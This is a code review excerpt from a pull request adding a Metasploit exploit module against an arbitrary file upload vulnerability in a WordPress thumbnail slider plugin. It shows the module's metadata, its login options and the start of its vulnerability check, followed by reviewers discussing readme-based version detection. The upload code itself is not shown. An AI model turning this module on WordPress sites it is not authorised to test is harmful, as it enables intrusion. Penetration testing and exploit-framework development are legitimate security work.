modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb

```diff
@@ -0,0 +1,158 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
+      'Description'    => %q{
+        This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Arash Khazaei', # EDB PoC
+                            'Shelby Pace'    # Metasploit Module
+                          ],
+      'References'     =>
+        [
+          [ 'EDB', '37998' ]
+        ],
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          [ 'Responsive Thumbnail Slider Plugin v1.0', { } ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00"
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Aug 28 2015",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
+        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin' ]),
+        OptString.new('PASSWORD', [ true, "Password to authenticate with", '' ])
+      ])
+  end
+
+  def check
+    plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')
```

Comment:
Is there a readme? https://github.com/rapid7/metasploit-framework/blob/8ade9b8aaef3f4e16d06e815fe303e74fdda3a7b/lib/msf/core/exploit/http/wordpress/version.rb has `check_plugin_version_from_readme` which a lot of other modules use

Reply:
Just tested. Unfortunately the version regex in extract_and_check_version does not work for the readme in this plugin, so it's not suitable to use.

Reply:
Can the version be pulled out of the plugin's README so that this can use `CheckCode::Appears`?

Reply:
Yes